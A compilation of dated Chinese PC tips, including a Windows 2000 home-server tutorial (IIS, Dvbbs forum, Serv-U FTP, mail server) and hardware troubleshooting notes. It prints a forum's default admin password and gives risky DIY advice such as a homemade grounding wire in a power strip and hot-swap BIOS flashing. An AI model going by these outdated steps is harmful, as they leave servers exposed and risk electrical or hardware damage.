#1　　七、扩展实施方案
    红外接口连接器的实施方案很多，图3给出了抗干扰电路和增大发射功率的综合方案（红外数据协会检测红外产品的标准方案之一），你根据需要加装其中的一部分，如只加装抗干扰电路。
    抗干扰电路由电阻R0（10Ω，0.5W）和电容C1（22μF）、C2（0.1μF）组成，其作用是滤除干扰信号，C1的作用是滤除低频干扰；C2的作用是滤除高频干扰。如果你的计算机系统电源质量较好，该部分电路可以省略，但省略的该部分电路会对通讯效果带来一定的影响。发射电路中电阻R2（560Ω，0.25W）、R3 （50Ω，0.25W）、电容C3（220pF）、三极管Q1构成脉冲放大电路，C3的作用是改善脉冲前后沿质量。实施时需根据光电接收管的性能对电阻R4（50Ω～500Ω）作精心调整，方能获得最佳接收效果和接收距离。红外数据协会（Infrared Data Association）还提供有中距离（3m～10m）、长距离（10m～30m）、广角（120°）等方案；通讯速度为1.15Mbps、4Mbps（当前大多笔记本电脑、掌上电脑使用此标准）、16Mbps的通讯标准；红外近程遥控载波方案；红外网络接入方案等等；如果你感兴趣，可去“http://www.irda.org/”查询。


花生壳新手教程

《一键清理系统垃圾》

花生壳新手教程

作者: 标题: 花生壳新手教程

运动男孩 许多新手问到的问题，许多也许都太简单，大家都不愿意回答，或者是懒得回答，因为越是简单的问题就越难解释清楚。写这篇东东的原因是想让刚刚接触WINDOWS服务器的人或者是虽然使用了一段时间但仍然百思不得其解的朋友能对花生、对WIN SERVER、对DNS、对域名、对IP、对端口及其映射、对IIS、对邮件服务器、对防火墙、对……，怎么要写那么多啊>>@_@<< 如果你还是有部分地方不懂，请先别急者上论坛提问，自己先仔细从自己过去学到的、听到的知识里头去想想。你每解答出一个难题，就代表你对这部分知识的了解越加深入，而你成为高手的日子也越将来到。

    一、从操作系统开始

    1、选择Server家族的系统

    如果我们要建立一个稳定而强大的网络服务器的话就必须使用一个支持网络服务的系统。在WINDOWS系统集合里面作为服务器的系统有以前的 NT Server系列、有现在比较流行的2000 Server、2000 Advanced Server 、还有将来的 .net Server 系列。而对于花生的使用者来说，作为个人网站或者小规模公司网站的建立，无论从速度和性能方面比较使用Windows 2000 Server是比较合适的。以后的介绍都会以这个系统为基础展开。

    另外提醒一句，现在D版市场上买的WIN2000大都是补丁过的，也就是所谓的SP版。微软现在最新的补丁是SP3。大家选择的时候最好买SP3的版本，可以省下上网补丁的不少时间哦：）

    2、安装系统和软件

    缺省模式安装WIN2000 SERVER系统就可以了。大多我们要用到的功能都有了。安装完成以后我们 还要安装拨号软件，我个人推荐RASPPPOE和NetVoyager，前一个安装起来比较复杂，对于新手的我们来说还是选个简单的好了：）NetVoyager是韩国人编的一个拨号软件，原理和RASPPPOE一样，在网卡上绑定一个协议，用ISDN的方式拨号，还支持自动拨号，不错吧：）

    这个软件的安装也是很简单的，不停的NEXT就OK了。安装完成以后运行他在桌面新建的图标，输入你的帐号和密码，就可以连接到INTERNET也就是我们说的公网了。（如果你找不到这个软件，当然也可以使用网络服务商提供给你的软件上网）

    连接到公网以后，第一件事情是上微软的Windows Update网站。就是点击“开始”在开始菜单最上面的那个"Windows Update"。他会弹出一系列的安装插件的窗口，统统点击“是”搞定。然后根据他的提示做，之中可能会让你从新启动只类的，所以你可能要重复好几次这一步直到把所有的“系统关键更新”全部更新完。记住，这段时间你最好不要登陆到任何其他网站，不要安装任何软件和其他插件。乖乖的等待他把全部更新下载、安装完毕。

    然后是安装网络防火墙，我的推荐是Norton 的个人防火墙安全好用，还有自动更新功能。同样是一轮冲锋“NEXT”搞定，安装完成后，运行它的“live Update"更新。

    有了网络防火墙还得有病毒防火墙，哎怎么哪么多堵墙啊。推荐是 Norton Antivirus 8.0中文企业版完成后同样要运行“live Update”更新到最新版本哦。

    万里长城的墙都筑好后，就轮到我们的花生壳啦，下载地址不用我说了吧？

    二、软件的设置

    1、设置花生壳

    要使用花生，必须要有一个帐户（护照），进入花生帐户的申请网页（ http://8008.oray.net:8008/Workstation/） 申请一个网域护照，注册你的花生壳，申请一个免费域名。（至于顶级域名，我们后面会讲到）

    完成了么？打开你的花生壳，就是系统右下脚，时间旁边的一个小盒子。顺便说明一下，这个小盒子在网络连通而又登陆花生服务器的时候是彩色的，一旦花生服务器或者你的网络出现故障，他会变成灰色。我们现在还没登陆，所以现在小盒子应该是灰色的。我们现在就来登陆服务器，双击小盒子，会弹出一个窗口，在“状态”页里，填入你刚才申请的帐号和密码，然后点“刷新列表”。（这时你的防火墙会告诉你花生壳要访问公网。你必须同意这个请求，我们选同意）如果能看到你刚才申请的域名，就代表你成功了！而花生现在应该会变成彩色的了。

    2、设置IIS

    各位，关键内容终于来了。IIS 5.0 是WIN2000自带的HTTP/FTP/SMTP/FRONTPAGE SERVER服务，它结合了ASP动态页面技术、FTP服务器、SMTP邮件服务器、frontpage 服务器，是一个非常强大的服务群组。

    我们用右键单击“我的电脑”选“管理”，在“计算机管理”窗口里展开“服务和应用程序”然后点选“Internet信息服务”在窗口右边，我们可以看到“默认 Web站点”并且其“状况”是“正在运行”；“主机头名”是空的“IP地址”为“全部未分配” ；“端口”是“80”，大家不要让这些太多的概念打乱阵脚，待会你就会明白，其实他们都不重要（这里说的不重要并不是他们真的不重要，而是对于我们来说，我们暂时不会因为需要改变他们而了解他们） 在“默认 Web站点”点击右键，选“属性”。又弹出一个“默认 Web站点 属性”的窗口。在这里你必须小心，不要乱修改里面的任何属性，除非你有把握修改是对你有益的。我们先把“Web站点”页的“说明”改掉，原来是“默认 Web站点”的说明改成你自己的站点的名称。然后我们点选“主目录”页，把“本地路径”也修改掉，点“浏览”，然后选择你网站所在的目录。比如 你想把网站文件保存在D盘的“MYWEBSITE”的目录下，你就可以点选“浏览”然后选定D盘的“MYWEBSITE”目录，然后确定。你就能看到“本地路径”一栏的地址变成"D:\MYWEBSITE"了。

    好了，最后一步是改变网站接入的文档。就是说，当人家在浏览器键入你的域名以后，服务器怎么知道该从你网站目录中那么多文件里打开其中一个给大家看呢？就是要看这里啦！我们选到“文档”页，看到“启用默认文档”中有三个文档，还有上下两个箭头和“添加”“删除”两个按钮。当IIS接到服务请求的时候它会在你的网站目录里头寻找，这三个文件的第一个，就是第一行的那个，如果找到，就打开这个文件以回应服务请求，如果找不到，就会寻找第二个，也就是第二行的那个，以此类推。所以，你要是想你的网站的效率更高一点，就必须把你的首页文件放在第一行。我们点选“添加”填入文件名，比如“index.asp”然后确定，然后你一看，怎么在最后一行啊？别急，你先点选刚才你填入的文件“index.asp”然后再点那个向上的箭头，就可以看见文件一点一点的上去啦：）

    好了，最基础的IIS设置，已经完成了，我们点“确定”。到浏览器键入自己的域名看看。

    3、设置自己的论坛、留言版、聊天室

    如果你只是使用了HTML的静态页面，那你只是使用了IIS不到10分之一的功能。有没有想过做一个想花生这样的论坛？可以么？当然可以！不过你必须先了解一些关于ASP、数据库等等的知识。不会很难的哟：）

    ASP全称是Active Server Pages 既是“动态服务页面”是微软的一种用于代替CGI（一种早期的动态服务及其其他服务的标准）的一种技术。现在最新的版本是asp .net 不过IIS 5是不能解释用ASP.NET写的页面的，我们还是用ASP吧。和ASP具有相同性质的有JSP、PHP、CRML……等等。大家性能和其他方面都各有千秋。对于我们这些新手来说不大可能自己遍出一套论坛或留言版之类的程序来，所以我们只能——他山之石，嘿嘿。

    我们到 （ http://down.vv66.com/ ） 找一个合适的论坛下载
又或者到（ http://www.dvbbs.net/download/dvbbs5_final.exe ）直接下载动网论坛（推荐）
动网论坛以快速和稳定著称，还有各式各样的插件安装，最关键的是他有详细的安装说明。对新手来说是再好不过的啦。（对于我的手来说也非常不错哦，好酸啊~~）

    下载以后，安装（自解压文件）到你的网站目录下比如“D:\mywebsite\”他会新建一个目录“dvbbs”。完成后，访问你的域名http://XXXX.vicp.net/dvbbs 看看。已经进入论坛啦~~哈哈。

    然后我们来设置论坛的颜色和一些配置。在浏览器键入http://XXXX.vicp.net/dvbbs 打开你的论坛用admin登陆，用户名是admin，密码是admin888，然后选“管理”为了安全起见，程序会让你再次输入用户名、密码，还多了一个附加码，主要是保证你的论坛的安全。进入管理页面后可以看到好多好多的选项。嘿嘿，这些让各位自己研究咯。不懂的话，可以到动网论坛( http://www.dvbbs.net/ )请教，另，论坛的目录下有些文本文件，很重要的哦，多研究一下。

    至于，留言版和聊天室的安装，和上面的基本类似，大家可以先试试，不懂的到坛子来问高手们咯：）
    4、FTP的架设

    哇，原来大家都希望建立自己的站点也~~。今天，我们就来看看FTP站的架设。

    和前面的HTTP服务器一样，要建立一个FTP站点必须要有相应的软件。网上现在有好多好多FTP的建站软件比如现在很热门的Serv-U、还有速度至上的RaidenFTPD、还有老牌FTP服务器软件WS-FTP、当然有我们刚才说到的IIS自带的FTP。

    作为新手，程序界面的简单易懂就很重要。所以还是选择了Serv-U 给大家讲。下载地址 ( http://www.cnyou.com/down/list.asp?id=1059 )

    安装完成以后程序会自动运行，我们会接到这样一条询问"Please "next"to proceed or "cancel" to skip the setup wizard"是问你要不要开始设置你的FTP服务器。当然要啊。呵呵，NEXT！

    然后问你"Enable small images with the menu items?"要不要小图标？这个随你的便啦（好象很废的样子）NEXT！

    然后要你点击“next”开始运行本地FTP服务器，并连接它，next!

    然后是硬盘的一阵狂响，又出来一个窗口"IP address(leave blank for dynamic or unknow IP)"问你所在的IP地址（不知道或者是动态IP的不用填）我们用花生的都不用理它啦，照点“next”了事。

    在下来这个窗口填入你的域名，输入你在花生里申请的域名或者独立域名，继续下一步。

    "Allow anonymous access?"要允许匿名登陆吗（登陆名为：anonymous）如果你打算把这个站点公开给大家使用，那就可以选YES，然后下一步；要是只想给自己人用（独食难肥啊！！），就选NO。

    我们那么大方，当然选YES啦，于是它问你FTP的主目录的路径，比如是D盘的FTPSITE目录，就可以填f:\ftpsite，当然也可以点那个文件柜在系统目录里中选啦。下一步！

    程序询问你是否要锁定这个目录，如果锁定，匿名登录的用户就只能访问你所刚才指定的目录，就是说他只能访问这个目录下的文件和文件夹，其他目录如（D:\abc）就不能访问。哈，我的秘密怎么能让别人知道？

    然后问你要不要建立一个用户？（不是匿名的那种）大家要是刚才禁止了匿名用户这里就要建立一个或以上的用户咯，要不是你的FTP就没人能够访问咯：）YES 。我们就建一个管理员的用户，填入van(这里自己随遍填哦，自己记得就行)，下一步密码……　不用说了吧？登陆目录是什么？和刚才一样就可以了，当然你也可以定义为（ d:\）哈。又问你要不要锁定，自己就算了，NO，NEXT！你给自己（ van ）什么权限呢？自己嘛，当然是权力越大越好啦（可要注意密码的复杂性以保安全哦） 选system administrator 然后NEXT，点FINISH就完成啦！哈哈！自己的FTP服务器就这样建成了，用自己的FTP客户端软件登陆上去试试吧：)

运动男孩 　5、邮件服务器的建立

    有了自己的HTTP、FTP站点后，是不是想有一个自己的邮件系统？完全免费还要无限空间？，还要提供SMTP和POP3服务让大家可以从OUTLOOK、FOXMAIL下载自己的邮件？还要有WEB界面？还要能在线申请？？！！哇，这个……你也太贪心了吧。忽忽，都没问题。我们来看看网上有什么邮件服务器软件可以帮我们做到这一点。网上流行的邮件服务器有权威的IMAIL、有MD、有Magic Winmail、有CMailServer。前面三个都是老外的产品，CMailServer却是我们中国人自己做的啦，而且功能一点都不比老外的差哦。我们下载来看看（http://www.cnyou.com/down/download.asp?downid=1&id=1403）。

    安装完毕后（大家要注意了，如果你的机器安装了邮件检测类的防病毒软件就要把它关掉了，因为会引起端口的冲突SMTP用的是25端口POP用的是110端口）自动打开程序，我们先点击“设置”按钮，在服务框里选你要作为什么服务器运行，我们选“互联网服务器”把把“支持ESMTP”（支持ESMTP：用来设置客户端发送邮件身份认证，可以有效的防止非法用户利用CMailServer发送垃圾邮件。）“允许邮件代理”（这样OUTLOOK、FOXMAIL等软件才能在你的服务器上下载邮件和发送邮件）“作为NT服务运行”（作为NT服务运行：用来设置CMailServer是否做为NT服务后台运行，这项功能仅对WinNT/2000/XP的系统有效。）钩上。

    在邮箱域名设置的地方选择“单域名”（哈，如果你想做多域名当然也可以，不过有点复杂，我们以后再说）然后在后面的输入栏里填入你的域名如(XXXX.vicp.net)哈当然如果你是独立域名也可以设为(XXXX.com之类)。注意如果你在此填写的域名是XXXX.vip.net那你的邮箱全名就是name@XXXX.vicp.net,又如果你填入的是XXXX.com那你的邮箱名就是name@XXXX.com。嘿嘿，一些投机的朋友可能会把域名设为263.net等等之类的名字，但很快就发现收不了信（可以发）这样是违背道德的哦：）我们还是规矩点好，呵呵。

    还没完，接着我们选“高级”不要乱改这窗口里面的东西（后果严重哦@_@），我们看“帐号”这个选项卡，里面的内容我来解释一下：

    “帐号申请时需要授权”这主要是用来管理用户帐号申请的。如果选择了这项设置，用户虽然可以申请帐号，但是并不能马上开通。需要管理员修改帐号设置，才能开通该邮箱帐号。#####我们不选。

    “默认邮箱大小”用来设置新用户邮箱缺省大小。#####个人喜欢，建议不要太大改为2M。

    “本地邮件地址可以简写”如果选择了这项设置，向本地用户发送邮件，可以只填写用户帐号，不需要写域名。#####钩上，这样可以方便一点。

    “允许通过网页申请帐号”用来设置是否开放WEB界面（上面有申请新用户、登陆邮箱、收发信件等内容）#####视忽你的需要咯，我们也选上。

    “所有邮件都抄送到此邮件地址”用来设置是否将所有通过CMailServer发送和接收的邮件保存到指定的本地邮箱。可用于邮件备份。#####算了，懒得。当然也可以钩。

    “自动收取POP3邮件”可以设置服务器是否自动收取用户设置的POP3邮件以及收取邮件的时间间隔。#####不钩，或者时间长一点。

    然后来到“其他”选项页。语言选择……不用多说了吧，当WINDOWS启动时，我们选最小化，那当WIN启动的时候服务器就会启动，并最小化在系统栏的小图标里。其他都不改，确定再确定。

    然后就可以添加新帐户咯，点“新帐号”。帐号：填入你邮箱的名字如van(你的邮箱就是van@XXXX.vicp.net)，密码，姓名：可以随便填（会作为发信人，让收信人看到），说明：可以不填。

    由于是自己的邮箱，当然是改为无限空间咯。选“不限大小”，如果是其他人的邮箱，也可以修改邮箱大小或者不限大小。

    要是你愿意用这个邮箱接收你另外邮箱的邮件，可以在其他POP邮箱一拦里填入相应信息，这里就不讲了。

    全部填好后，确定。

    最后一步，在“工具”里选“设置虚拟目录”（时间有点长，不是死机）

    可以到浏览器去看你的信啦，打入http://xxxx.vicp.net/mail

    登陆看看：）

    其他属性的修改可以看该软件的帮助，里面很详细哦：）

有零工作室　www.you0.com www.you0.net联系QQ 3149886


还原卡惹麻烦

《一键清理系统垃圾》

还原卡惹麻烦

《中国电脑教育报》陈新锋

    一日，机房一台电脑无法显示，怀疑是显卡接口处或显卡松动所制，于是打开机箱，将显卡拔出重新插入，再开机，如此数次，还是无法显示。难道是显卡或显示器出了问题？又将显卡和显示器分别替换到其它电脑当中，都能正常显示，看来不是显卡和显示器的“错”。

    重新开机，仔细观察了启动现象：主板没有报警声，但电源指示灯亮，风扇有转动，看来问题应该出在主板上，只好依次检查影响显示的几个关键部位。用替换法查出内存没有损坏，关电后重新插拔内存使其接触良好还是不能显示，CPU也有没问题。面对这种情况我一时也想不出原由，看看天色又晚，只要作罢，等第二天再查。没想到第二天用户开机时却又一切正常，可是过了些时日它又不能显示了。究竟是什么原因导致它出现这样的情况呢？此问题困扰了我数日，一次突然想起电脑中装着系统还原卡，难道是它影响了显示？心头一热，赶紧拔掉它，重新启动，随着清脆的一声 “嘟”，蓝天白云又出现在我的面前，问题终于解决了。重新插入还原卡也能正常显示。原因找到了：用户在使用的过程中无意间晃动了桌子，电脑也随着振动，也就导致还原卡的松动影响了显示，电脑的再次振动可能使还原卡更松，也可能使其接触稍微紧一点，因此外部表现为有时显示有时不显示。（当电脑出现类似情况时，我采用了一种不太正确的做法：先拍了几下主机，再启动，再拍，再启，反复几次也能让它正常显示，这证实我的想法是正确的。）看来在使用电脑的过程中要给它一个稳定的环境，减少一些不必要的麻烦。


恢复“开始”菜单中的“运行”

《一键清理系统垃圾》

恢复“开始”菜单中的“运行”

    重庆读者飞翔来信：最近不知道执行了什么操作，我的电脑上“开始”菜单里的“运行”选项不见了，能不能帮我找回来啊？

    A：①如果安装的是Win98：打开注册表编辑器，找到“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer”，把右边窗格中的双字节值“NoRun”修改为0或删除，然后注销重新登录即可恢复。②如果安装的是Win2000/XP：在任务栏上点击鼠标右键，选择“属性”，在“开始菜单→自定义→高级”里面可以设定是否出现运行选项。


机箱去静电法

《一键清理系统垃圾》

机箱去静电法

    在咱们DIY漫漫“征机”路上，有否碰到过静电之灾呢，本人就是深受静电之害，苦苦探索，才找到让静电消除的办法，下面这篇文章讲讲俺如何消灭静电的“苦难”经历，希望能给大家一点点帮助。
        记得电脑刚组装回时，使用都很正常，一次不小心手碰到机箱后部面板上（机箱除了后部面板裸露，其它部位都被油漆涂上了基本感觉不出静电）被静电狠狠击了一下。第二天一早跑到经销商那儿评理去，但是商家说这是正常现象，让俺在使用时注意就可以了。因为普通家庭一般都使用两相电源，无地线，机箱不能很好地接地，只好忍耐着尽量小心不碰到机箱后部裸露部位，将就着用吧！
        后来一次事故，不小心将音箱给弄“下岗”了，只好用耳机替代着用，刚一带上，就被电得一弹，这下可完了，连耳机都不能听，你说说要是碰上这种情况，要多痛苦就有多痛苦，俺下定决心一定要“铲除”机箱上静电。
        俺找来一根电线（普通电线即可，但不能用漆包线），一头接地，另一头连在机箱后部裸露处，这办法一试还行，但还是带一点静电，不行！要弄就弄最好，要是从电源入口处接地，那不有更好的效果吗？俺家墙上固定电源插座是两孔的，不行，顺着线往下看，咦！计算机的电源插头为三头，一般使用者都是用计算机专用插座来转接，仔细一研究，这种插座中间部位为地线插孔，两侧分别是火线和零线。马上将接在机箱上接地的电线拆下，装上一小插头，将其插入专用插座中间部位，这样一来，计算机电源的地线就被接地，静电完完全全被导出了。一试效果还真行，没一丁点静电了，既美观又实用。
        哦！对了，还有一个小技巧忘了告诉大家，也许有许多朋友都在用显示器保护屏，这种装置能起到防止辐射和静电伤害的作用，显示器保护屏有一根引线来导出接收到的静电，你可将引线的另一头连在刚刚制作出的导静电线路的任意部位，只需将导静电线路割开一个小口，露出金属即可，这样就可以将显示器保护屏上的静电也导出（注：也许有的“虾友”误以为静电是因为主板和机箱没有很好地进行绝缘，才导致机箱上有静电，其实是因为机箱电源内部的地线与电源外壳相连，才导致有静电出现。静电对微机的危害是众所周知的，弄不好会损坏机箱内部板卡上各种集成芯片，虽然是“可能”，但还是有这种几率存在。总之，俺还是希望各位虾友远离静电，少一些危险，多一份安全）。
        以后大家有什么好的建议，可别忘了给俺来信。


计算机变慢的十大原因

《一键清理系统垃圾》

计算机变慢的十大原因

  1、在开机时加载太多程序

    2、桌面上开启桌布

    3、没有定期清理硬磁盘和重组硬磁盘

    以下的，我就会很详细地说明一下如何加速计算机和令计算机慢的病征！解决七大常见影响计算机表现的原凶当计算机忽然慢下来时，你可能会怀疑自己是否做错了甚么而引致损害了计算机？其实不必太介怀，因为一个小小改变，都可能会影响到计算机运作表现，而且在使用计算机的过程中，无可避免地都会引起各种些微的改变。任何问题总有方法可以解决的，就让我细细道出七大常见影响计算机表现的原因，解决了它们之后，便可以安心享用计算机的高性能。

    4、删除常驻程序

    何谓常驻程序呢？常驻程序就是在开机时加载的程序，而那些程序就叫做常驻程序。常驻程序不但拖慢开机时的速度，而且更快地消耗计算机资源以及内存，但你可能会问：那些程序全都有用的耶！那我可以答你的就是：你想要那些有用的程序来牺牲速度，还是不要那些程序来回复速度呢？自己想一想吧！一般来说，如果想删除常驻程序，可去\"启动\"清单中删除，但如果想详细些，例如是icq、popkiller 之类的软件，是不能在\"启动\"清单中删除的，要去\"附属应用程序\"，然后去 \"系统工具\"，再去\"系统信息\"，进去后，按上方工具列的\"工具\"，再按\"系 统组态编辑程序\"，进去后，在\"启动\"的对话框中，就会详细列出在启动电 脑时加载的常驻程序了！

    5、桌面上不要摆放桌布和关闭activedesktop

    不知大家有否留意到，我们平时一直摆放在桌面的桌布，其实是很浪费计算机资源的！不但如此，而且还拖慢计算机在执行应用程序时的速度！本想美化桌面，但又拖慢计算机的速度，在这时，你是否会有一种\"不知怎样\"的感觉呢？还有一点，不知大家有否试过，就是当开启桌布时，每逢关闭一个放到最大的窗口时，窗口总是会由上而下、慢慢、慢慢地落，如果有这种情况出现，你必须关闭桌布！方法是：在桌面上按鼠标右键，再按内容，然后在\"背景\"的对话框中，选\"无\"，建议在\"外观\"的对话框中，在桌面预设的青绿色，改为黑色......至于关闭activedesktop，即是叫你关闭从桌面上的web画面，例如在桌面上按鼠标右键，再按内容，然后在\"背景\"的对话框中，有一幅桌布，名为windows98，那副就是web画面了！所以千万不要开启。依我所说，布只可拿四个字来形容，就是\"红颜祸水\"！

    6、删除一些不必要的字型

    系统运行得慢的其中一个原因，就是字型多少的关系！安装的字型愈多，就占用愈多的内存，从而拖慢计算机的速度！所以我们要删除一些不必要的字型。要删除一些不必要的字型，你可到控制台，再进去一个叫\"字型\"的数据夹，便可删除字型，但，要怎样才知道，那些字有用，那些字没用呢？例如：如果你不常到 ms_dos模式的话，就删除dos 字型！因为各个人都可能喜爱某种字型，所以我也不能确定要删除那些 字型，不过我在此，有个秘决教你，如果你有华康粗黑字型，且又有新 细明体的字型，建议你删除华康粗黑字型，如果你有新细明体，且又有细明体，就删除细明体吧！

    7、定期重组硬磁盘

    计算机硬盘中最细小的单位是扇区，一个档案通常会占用若干扇区，每当硬盘用久了，无数次的新增、更改和删除档案后，就会造成很多断断续续的扇区，因而非连续性的档案便会愈来愈多，硬盘磁头便需要花更多时间跳来跳去来读取数据，这就导致硬盘速度减慢。有见及此，windows才会有\"重组磁盘\"出现。只要执行\"重组磁盘\"，所有非连续性的档案都会被重新编排得整整齐齐，至于执行时间，大约一星期左右执行一次便可了。

    8、设定虚拟内存

    硬盘中有一个很宠大的数据交换文件，它是系统预留给虚拟内存作暂存的地方，很多应用程序都经常会使用到，所以系统需要经常对主存储器作大量的数据存取，因此存取这个档案的速度便构成影响计算机快慢的非常重要因素！一般win98预设的是由系统自行管理虚拟内存，它会因应不同程序所需而自 动调校交换档的大小，但这样的变大缩小会给系统带来额外的负担 ，令系统运作变慢！有见及此，用家最好自定虚拟内存的最小值和最大值，避免经常变换大小。要设定虚拟内存，在\"我的计算机\"中按右键，再按内容，到\"效能\"的对话框中，按\"虚拟内存\"，然后选择\"让自已设定虚拟内存设定值\"，设定\"最小值\"为64，因为我的计算机是32mbram，所以我就设定为64，即是说，如果你的内存是64mbram，那在\"最小值\"中，就设为128。顺带一提，在\"效能\"的对话框中，选择\"档案\"，将原先设定的\" 桌上型计算机\"，改为\"网络服务器\"，是会加快系统运作的；还有，在\"磁盘\"的对话框中，不要选\"每次开机都搜寻新的磁盘驱动器\"，是会加快开机速度的！

    9、更改开机时的设定

    虽然你已知道了如何新增和移除一些常驻程序，但你又知不知道，在开机至到进入win98的那段时间，计算机在做着什么呢？又或者是，执行着什么程序呢？那些程序，必定要全部载完才开始进入win98，你有否想过，如果可删除一些不必要的开机时的程序，开机时的速度会否加快呢？答案是会的！想要修改，可按\"开始\"，选\"执行\"，然后键入win.ini，开启后，可以把以下各段落的内容删除，是删内容，千万不要连标题也删除！它们包括：[compatibility]、[compatibility32]、[imecompatibility]、[compatibility95]、[modulecompatibility]和。

    10、彻底删除程序

    大家都知道，如果想移除某些程序，可到\"新增/移除程序\"中移除，但大家又知不知道，它只会帮你移除程序，而不会帮你移除该程序的注册码和一些登录项目呢？这不是win98蠢，而是它在这方面不够专业，要彻底删除程序，要找回些\"专业\"删除软件来移除才成事！先前symantec公司出品的nortonuninstall(以下简称为nud)，因为有某部份破坏了某些删除软件的版权，故此全世界已停止出售，正因如此，symantec才出了cleansweep(以下简称为cs)，不过论功能上，还是nud更胜一寿！言归正传，其实除了这两个软件外，还有很多同类软件都能有效地移除程序，既然nud已绝版，那我就说cs吧。下载并安装后，如果你想移除程序，只要用cs来移除，它便会一拼移除该程序的登录项目和注册码！我在此帮\"新增/移除程序\"改了个别名，就是\"新增垃圾、移除程序\"！垃圾是指被遗弃的登录项目和注册码，程序就是程序啰！


计算机故障总汇

《一键清理系统垃圾》

计算机故障总汇

  一、主板
    主板是整个电脑的关键部件，在电脑起着至关重要的作用。如果主板产生故障将会影响到整个PC机系统的工作。下面，我们就一起来看看主板在使用过程中最常见的故障有哪些。

常见故障一：开机无显示

    电脑开机无显示，首先我们要检查的就是是BIOS。主板的BIOS中储存着重要的硬件数据，同时BIOS也是主板中比较脆弱的部分，极易受到破坏，一旦受损就会导致系统无法运行，出现此类故障一般是因为主板BIOS被CIH病毒破坏造成（当然也不排除主板本身故障导致系统无法运行。）。一般BIOS被病毒破坏后硬盘里的数据将全部丢失，所以我们可以通过检测硬盘数据是否完好来判断BIOS是否被破坏，如果硬盘数据完好无损，那么还有三种原因会造成开机无显示的现象：

    1. 因为主板扩展槽或扩展卡有问题，导致插上诸如声卡等扩展卡后主板没有响应而无显示。

    2. 免跳线主板在CMOS里设置的CPU频率不对，也可能会引发不显示故障，对此，只要清除CMOS即可予以解决。清除CMOS的跳线一般在主板的锂电池附近，其默认位置一般为1、2短路，只要将其改跳为2、3短路几秒种即可解决问题，对于以前的老主板如若用户找不到该跳线，只要将电池取下，待开机显示进入CMOS设置后再关机，将电池上上去亦达到CMOS放电之目的。

    3. 主板无法识别内存、内存损坏或者内存不匹配也会导致开机无显示的故障。某些老的主板比较挑剔内存，一旦插上主板无法识别的内存，主板就无法启动，甚至某些主板不给你任何故障提示（鸣叫）。当然也有的时候为了扩充内存以提高系统性能，结果插上不同品牌、类型的内存同样会导致此类故障的出现，因此在检修时，应多加注意。

    对于主板BIOS被破坏的故障，我们可以插上ISA显卡看有无显示（如有提示，可按提示步骤操作即可。），倘若没有开机画面，你可以自己做一张自动更新BIOS的软盘，重新刷新BIOS，但有的主板BIOS被破坏后，软驱根本就不工作，此时，可尝试用热插拔法加以解决（我曾经尝试过，只要BIOS相同，在同级别的主板中都可以成功烧录。）。但采用热插拔除需要相同的BIOS外还可能会导致主板部分元件损坏，所以可*的方法是用写码器将BIOS更新文件写入BIOS里面（可找有此服务的电脑商解决比较安全）。

常见故障二：CMOS设置不能保存
    此类故障一般是由于主板电池电压不足造成，对此予以更换即可，但有的主板电池更换后同样不能解决问题，此时有两种可能：

    1. 主板电路问题，对此要找专业人员维修；

    2. 主板CMOS跳线问题，有时候因为错误的将主板上的CMOS跳线设为清除选项，或者设置成外接电池，使得CMOS数据无法保存。

常见故障三：在Windows下安装主板驱动程序后出现死机或光驱读盘速度变慢的现象

    在一些杂牌主板上有时会出现此类现象，将主板驱动程序装完后，重新启动计算机不能以正常模式进入Windows 98桌面，而且该驱动程序在Windows 98下不能被卸载。如果出现这种情况，建议找到最新的驱动重新安装，问题一般都能够解决，如果实在不行，就只能重新安装系统。

常见故障四：安装Windows或启动Windows时鼠标不可用

    出现此类故障的软件原因一般是由于CMOS设置错误引起的。在CMOS设置的电源管理栏有一项modem use IRQ项目，他的选项分别为3、4、5......、NA，一般它的默认选项为3，将其设置为3以外的中断项即可。

常见故障五：电脑频繁死机，在进行CMOS设置时也会出现死机现象

    在CMOS里发生死机现象，一般为主板或CPU有问题，如若按下法不能解决故障，那就只有更换主板或CPU了。

    出现此类故障一般是由于主板Cache有问题或主板设计散热不良引起，笔者在815EP主板上就曾发现因主板散热不够好而导致该故障的现象。在死机后触摸CPU周围主板元件，发现其温度非常烫手。在更换大功率风扇之后，死机故障得以解决。对于Cache有问题的故障，我们可以进入CMOS设置，将Cache禁止后即可顺利解决问题，当然，Cache禁止后速度肯定会受到有影响。

常见故障六：主板COM口或并行口、IDE口失灵

    出现此类故障一般是由于用户带电插拔相关硬件造成，此时用户可以用多功能卡代替，但在代替之前必须先禁止主板上自带的COM口与并行口（有的主板连IDE口都要禁止方能正常使用）。

显卡
常见故障一：开机无显示
    此类故障一般是因为显卡与主板接触不良或主板插槽有问题造成。对于一些集成显卡的主板，如果显存共用主内存，则需注意内存条的位置，一般在第一个内存条插槽上应插有内存条。由于显卡原因造成的开机无显示故障，开机后一般会发出一长两短的蜂鸣声（对于AWARD BIOS显卡而言）。

常见故障二：显示花屏，看不清字迹

    此类故障一般是由于显示器或显卡不支持高分辨率而造成的。花屏时可切换启动模式到安全模式，然后再在Windows 98下进入显示设置，在16色状态下点选“应用”、“确定”按钮。重新启动，在Windows 98系统正常模式下删掉显卡驱动程序，重新启动计算机即可。也可不进入安全模式，在纯DOS环境下，编辑
SYSTEM.INI文件，将display.drv=pnpdrver改为display.drv=vga.drv后，存盘退出，再在Windows里更新
驱动程序。

常见故障三：颜色显示不正常，此类故障一般有以下原因：
    1. 显示卡与显示器信号线接触不良
    2. 显示器自身故障
    3. 在某些软件里运行时颜色不正常，一般常见于老式机，在BIOS里有一项校验颜色的选项，将其开启即可
    4. 显卡损坏；
    5. 显示器被磁化，此类现象一般是由于与有磁性能的物体过分接近所致，磁化后还可能会引起显示画面出现偏转的现象。

常见故障四：死机

    出现此类故障一般多见于主板与显卡的不兼容或主板与显卡接触不良；显卡与其它扩展卡不兼容也会造成死机。

常见故障五：屏幕出现异常杂点或图案

    此类故障一般是由于显卡的显存出现问题或显卡与主板接触不良造成。需清洁显卡金手指部位或更换显
卡。

常见故障六：显卡驱动程序丢失

    显卡驱动程序载入，运行一段时间后驱动程序自动丢失，此类故障一般是由于显卡质量不佳或显卡与主板不兼容，使得显卡温度太高，从而导致系统运行不稳定或出现死机，此时只有更换显卡。

    此外，还有一类特殊情况，以前能载入显卡驱动程序，但在显卡驱动程序载入后，进入Windows时出现死机。可更换其它型号的显卡在载入其驱动程序后，插入旧显卡予以解决。如若还不能解决此类故障，则说明注册表故障，对注册表进行恢复或重新安装操作系统即可。

声卡
常见故障一：声卡无声。出现这种故障常见的原因有：
